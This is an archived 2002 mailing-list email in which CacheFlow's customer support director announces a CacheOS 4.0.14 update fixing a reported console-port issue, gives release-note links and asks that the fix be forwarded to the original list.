RE: svindel.net security advisory - web admin vulnerability in Ca cheOS

From: Campbell, Dirk (dirk.campbellat_private)
Date: Tue Feb 05 2002 - 09:25:06 PST

    Hello All:

    The purpose of this email is to advise you that CacheFlow Inc. has provided
    a software update for the potential issue outlined in your January 8, 2002
    email addressed to 'bugtraqat_private' An updated version of
    software is now available for all supported CacheFlow hardware platforms,
    and may be obtained by CacheFlow customers at the following URL:

    http://download.cacheflow.com/

    The specific reference to the software update is contained within the
    Release Notes for CacheOS Versions 4.0.14, Release ID 17085 and 17087, as
    follows:

    http://download.cacheflow.com/release/SA/4.0.14/relnotes.htm
    http://download.cacheflow.com/release/CA/4.0.14/relnotes.htm

    .SR 1-1350501: This update modified a condition where sending "GET" to the
    console port could result in an illegible message. This update addresses the
    potential BugTraq security issue.

    Upon your download and use of this update, CacheFlow Inc. is requesting your
    acknowledgement by responding to this email, of the modification provided.
    In addition, we would like to request that you forward the above-stated
    update information to your original mailing list.  We thank you for your
    time.  Please feel free to contact me should you have any questions or if I
    can provide you with any additional information.

     Dirk Campbell
     Director, CacheFlow Customer Support
     CacheFlow Inc.
     650 Almanor Avenue